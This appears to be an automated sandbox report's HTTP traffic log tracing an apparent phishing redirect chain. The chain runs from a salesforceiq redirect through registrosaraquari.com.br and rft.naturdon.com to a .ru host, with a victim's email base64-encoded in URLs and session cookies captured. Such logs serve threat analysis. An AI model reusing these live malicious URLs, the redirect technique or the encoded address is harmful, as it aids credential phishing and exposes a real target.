zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /r?target=603feeba78af1c08f5743ad0&t=AFwhZf0amBvhYfM9RctKtaa9k2LfIrNDSUS7iRYke1td_G46ivu2nAbPY5ST0sm4YvyV9nje6hJ_AkhaGAB2Q-VekJszZwpRHWS5Qxj8Pkn-XA_5zkvZHw1vuXoxIMX7IYPI_hkyjtNB&url=https://registrosaraquari.com.br/g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t HTTP/1.1Host: app.salesforceiq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t HTTP/1.1Host: registrosaraquari.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t HTTP/1.1Host: registrosaraquari.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://registrosaraquari.com.br/g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /0/index.xslt HTTP/1.1Host: registrosaraquari.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: xsltReferer: https://registrosaraquari.com.br/0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: registrosaraquari.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://registrosaraquari.com.br/0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /iVYo/ HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://registrosaraquari.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=rsNvY6muks1hqYRj1wy2GUnJ3uq0Mv3FPxDcfLQQBBg-1742234537-1.0.1.1-fvrDJV64aId7mxKNh.keiA.gLg_RhuwiB0a7zrv375E1f5EPXJ34E.96ePSYh6h.EWx07lSDI9z9MBZn1nT44xJy3ggw0EHFOVIRmUu3iDE
Source: global traffic HTTP traffic detected: GET /loray!m1hxo77 HTTP/1.1Host: 2aezx.szsnqp.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://rft.naturdon.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /loray!m1hxo77 HTTP/1.1Host: 2aezx.szsnqp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /iVYo/ HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://rft.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgyVmk3Vzl4UjgrcHp2bkdYeGViM2c9PSIsInZhbHVlIjoiUjRycDdYa2JwSWdEYlhTVWp0ZmJESmpabGJoRDUxNG1ad01UT2l4dlBYZ3dHSmI5ZXpzVEYwR1hCZEJ4V21ZWk13UXRuUlgyMllXZFZIVEUweDFodFVMRzNjOW13VEdjTXptRmdrTUhkVk51cWl3NXIyVDlqSFUwWEtiMG1sdGwiLCJtYWMiOiJiNGEwYjZmYjBiMmQ2ZmQyYjYyMDY1MjMyZTk2YjJiOGJlMWI4Y2Q0NjNkYTBlMzYwNjdmMTUwYzFjOWQ2YzJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlB3TUw2RjM3dmhUN0VNM0JabWh2bEE9PSIsInZhbHVlIjoiQk1ITTdja3gyVXFDdGVsZWplRnBsdXBGZGFkdDZvY09YTTR1SGwwM3E2Q0dwNjNtRThWVHBhbVZIeVBGRnlqQ0Nlb3MwL20yRWNTU0R4RlZhZzBwd0l4RnltcEUzbE5ZaWZGWGV2SS9mVkkyTFR6OEQxamNha1Y5SlNjdjlsN0kiLCJtYWMiOiI5NjMzYTBlM2JkODgzMDIwZDUyMDliNjMwM2RhMzNkMDczMWFiMDQ5NDgwMGM0ZTQwNjdkMTdmOWIxOGQ5MmJiIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yp9BZPnLvX9qppjZ6vwVf7ZEopBEJOVpdL8dvd HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgyVmk3Vzl4UjgrcHp2bkdYeGViM2c9PSIsInZhbHVlIjoiUjRycDdYa2JwSWdEYlhTVWp0ZmJESmpabGJoRDUxNG1ad01UT2l4dlBYZ3dHSmI5ZXpzVEYwR1hCZEJ4V21ZWk13UXRuUlgyMllXZFZIVEUweDFodFVMRzNjOW13VEdjTXptRmdrTUhkVk51cWl3NXIyVDlqSFUwWEtiMG1sdGwiLCJtYWMiOiJiNGEwYjZmYjBiMmQ2ZmQyYjYyMDY1MjMyZTk2YjJiOGJlMWI4Y2Q0NjNkYTBlMzYwNjdmMTUwYzFjOWQ2YzJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlB3TUw2RjM3dmhUN0VNM0JabWh2bEE9PSIsInZhbHVlIjoiQk1ITTdja3gyVXFDdGVsZWplRnBsdXBGZGFkdDZvY09YTTR1SGwwM3E2Q0dwNjNtRThWVHBhbVZIeVBGRnlqQ0Nlb3MwL20yRWNTU0R4RlZhZzBwd0l4RnltcEUzbE5ZaWZGWGV2SS9mVkkyTFR6OEQxamNha1Y5SlNjdjlsN0kiLCJtYWMiOiI5NjMzYTBlM2JkODgzMDIwZDUyMDliNjMwM2RhMzNkMDczMWFiMDQ5NDgwMGM0ZTQwNjdkMTdmOWIxOGQ5MmJiIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikp1QlF4M3hHK2tXOHdDYzNiRFVwQ0E9PSIsInZhbHVlIjoieGRRRnYydmZGVG15ZmhpTTVabUpKZ0ZmcnA4VUJ0ejZXN01ESDUvcFl6SFBWY0x1bytNNTBYNGhLK3lzR2dtaXhWUEtOUUZYRUkrMTFKdC9HdDZhOHRBdVM1ODA0N0dMRWpidHFWai84Q3hHYm5vSzB6Y3E5dVJaeGdmRm9ZcHAiLCJtYWMiOiIyZTU0Y2QwNmVjNTc3N2NjODE1NWQzZDg5NWNlYzgxODQ5MmMxMjdmYjJjOGVjOGI4MzhmNzFhZjEzNzZjNzk1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkRWQjdvSE1mcFFOa2svK1dnMmdXN3c9PSIsInZhbHVlIjoiNUZ4VmplcERpbjZseW4rbnpmZkhCTzB4SktIL2s1OW5IV2JFeWd2S3M4QjVBaVBONDBNMEVvdUpJM3hNWW9zTmNrOFM1dW91b0tCRmt5b2JCVkJrdklEQXlCczZ0OUZaQVA0QXFYcWs0bGJsZXl1cDM4L0lCR0tIT0VIUktQaEYiLCJtYWMiOiJiODZjNTgzZmI1OWE0MjcyNTJjMzk1ZDhmMjI1YTQ3Y2UwODI1OTJmN2YwMmQ0Y2ZjODllN2Y5N2VhOThiMzRhIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /xyyV1ZiqNXRC8zWXcIUDTUea88bP6rhTuulsSZCyRMCDOqwZZUjy HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJpSGNwbjUvTlNEVnVNbWpMM1ZWdFE9PSIsInZhbHVlIjoibXpydHFvNVhQblhwbnlaWkV3MDhzWXZhVWM1V3pscnNSbXBwVTFNNWUyTnJ1VmozcWtzdE0rQ2MzQ3hUb3FIbDAzL3VsWXJwTVdsZXovSlA4ajdXRzV3K1U0VGU3VFU3dkZuVTJpU3BrYk9rempIMnVzNncyVzBCM3pWRFlDLzQiLCJtYWMiOiIzNjRjN2NmNWJjODFiOWYyNmU5YmM1Zjg1ZjRlNTFiZTJlMzY4ZTkyMzM3MjBkZmRmOTc5ZDYxNmMwN2QyN2RhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im0yZFZwbnd1RmEwL2d4cTQ5VStkSEE9PSIsInZhbHVlIjoib0k1TnVIckFNdGN2RnJPQVBXRVlTYkM5U0lTbUJlQlR4RUZmSDg0eDVyaENvd1FhaGlZUFJkdFlCZFdjRElUeC9ESVJVb0hCWi85ZDhuaStwRVMyQVhXTEUwRXNIVG1Zb2hwMmZjbi91c3BnQnQ4eHVDaFJJWnZmQm5BeENEYlEiLCJtYWMiOiI4ZjNhYTVjZTRlMGNjNTg4ZDEzM2E3M2Q3ZjI5N2VjMjBlYTA3NzY2M2JkNTk4OGY0OGNjMGJkMDgzOTVjZGRlIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rft.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJpSGNwbjUvTlNEVnVNbWpMM1ZWdFE9PSIsInZhbHVlIjoibXpydHFvNVhQblhwbnlaWkV3MDhzWXZhVWM1V3pscnNSbXBwVTFNNWUyTnJ1VmozcWtzdE0rQ2MzQ3hUb3FIbDAzL3VsWXJwTVdsZXovSlA4ajdXRzV3K1U0VGU3VFU3dkZuVTJpU3BrYk9rempIMnVzNncyVzBCM3pWRFlDLzQiLCJtYWMiOiIzNjRjN2NmNWJjODFiOWYyNmU5YmM1Zjg1ZjRlNTFiZTJlMzY4ZTkyMzM3MjBkZmRmOTc5ZDYxNmMwN2QyN2RhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im0yZFZwbnd1RmEwL2d4cTQ5VStkSEE9PSIsInZhbHVlIjoib0k1TnVIckFNdGN2RnJPQVBXRVlTYkM5U0lTbUJlQlR4RUZmSDg0eDVyaENvd1FhaGlZUFJkdFlCZFdjRElUeC9ESVJVb0hCWi85ZDhuaStwRVMyQVhXTEUwRXNIVG1Zb2hwMmZjbi91c3BnQnQ4eHVDaFJJWnZmQm5BeENEYlEiLCJtYWMiOiI4ZjNhYTVjZTRlMGNjNTg4ZDEzM2E3M2Q3ZjI5N2VjMjBlYTA3NzY2M2JkNTk4OGY0OGNjMGJkMDgzOTVjZGRlIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /34ljcaLCdgnxyAWwV8920 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /xyR81473VsYaArsvHmgh24 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveOrigin: https://rft.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveOrigin: https://rft.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 